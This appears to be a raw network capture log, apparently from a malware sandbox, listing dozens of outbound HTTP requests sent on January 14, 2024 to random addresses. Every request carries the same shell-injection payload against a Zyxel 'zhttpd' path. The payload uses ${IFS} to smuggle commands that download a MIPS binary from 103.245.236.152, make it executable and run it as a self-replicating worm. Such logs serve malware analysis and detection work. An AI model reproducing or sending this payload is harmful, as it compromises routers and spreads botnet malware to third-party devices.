                                        Jan 14, 2024 16:18:38.306794882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2668192.168.2.1350510110.65.244.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306838989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2669192.168.2.135904418.159.153.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306881905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2670192.168.2.134576695.68.11.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306910992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2671192.168.2.1334424121.85.205.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.306967974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2672192.168.2.1347408162.68.244.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307032108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2673192.168.2.1360202131.98.3.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307059050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2674192.168.2.135805614.240.101.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307095051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2675192.168.2.1354944146.14.210.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307137012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2676192.168.2.135342443.181.17.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307174921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2677192.168.2.1360640132.35.96.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307230949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2678192.168.2.13473769.121.194.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307260036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2679192.168.2.133794873.24.169.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307288885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2680192.168.2.1334858106.31.84.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307343006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2681192.168.2.1355340155.199.155.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307382107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2682192.168.2.135059444.134.116.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307432890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2683192.168.2.135401245.54.177.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307483912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2684192.168.2.1351942152.153.172.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307509899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2685192.168.2.1359276204.214.77.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307568073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2686192.168.2.135816094.24.83.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.307600975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2687192.168.2.134527650.252.107.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324642897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2688192.168.2.1353254132.48.226.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324672937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2689192.168.2.133549493.198.109.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324743032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2690192.168.2.133807090.111.37.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324780941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2691192.168.2.136032853.178.65.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324836016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2692192.168.2.133361265.102.170.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.324955940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2693192.168.2.1356106174.147.120.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325002909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2694192.168.2.134784644.34.88.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325069904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2695192.168.2.135029873.130.4.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325110912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2696192.168.2.135358832.143.204.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325180054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2697192.168.2.1339986217.60.7.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325232983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2698192.168.2.135530695.82.102.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325285912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2699192.168.2.133607094.64.139.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325325012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2700192.168.2.1351532223.38.122.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325398922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2701192.168.2.1350902168.4.25.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325438976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2702192.168.2.133533235.198.188.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325521946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2703192.168.2.134183095.241.2.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325577974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2704192.168.2.1356098135.56.146.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325644016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2705192.168.2.135467419.222.142.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325685978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2706192.168.2.1360582216.55.9.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325741053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2707192.168.2.1344290168.33.186.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325803041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2708192.168.2.1350622153.253.42.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325855970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2709192.168.2.136008849.154.237.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325930119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2710192.168.2.1357958125.251.1.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.325987101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2711192.168.2.1355286211.130.102.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326045036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2712192.168.2.1348622126.229.132.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326092005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2713192.168.2.1335048220.195.109.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326162100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2714192.168.2.1336154189.28.232.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326220036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2715192.168.2.1344830211.120.142.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326263905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2716192.168.2.1352414113.93.165.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326334953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2717192.168.2.1360568110.33.209.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326383114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2718192.168.2.1338672181.118.150.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326428890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2719192.168.2.1333030174.73.157.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326483965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2720192.168.2.13440142.159.56.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326527119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2721192.168.2.135368266.210.13.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326575994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2722192.168.2.133311295.91.107.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326634884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2723192.168.2.1340506172.141.253.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326664925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2724192.168.2.1350950210.90.47.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326729059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2725192.168.2.134754485.189.0.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326807022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2726192.168.2.1337024182.243.44.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326881886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2727192.168.2.1349504112.210.71.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326920986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2728192.168.2.133680061.251.244.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.326992035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2729192.168.2.1336928168.117.40.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.327032089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2730192.168.2.133855851.147.122.210443
                                        TimestampBytes transferredDirectionData
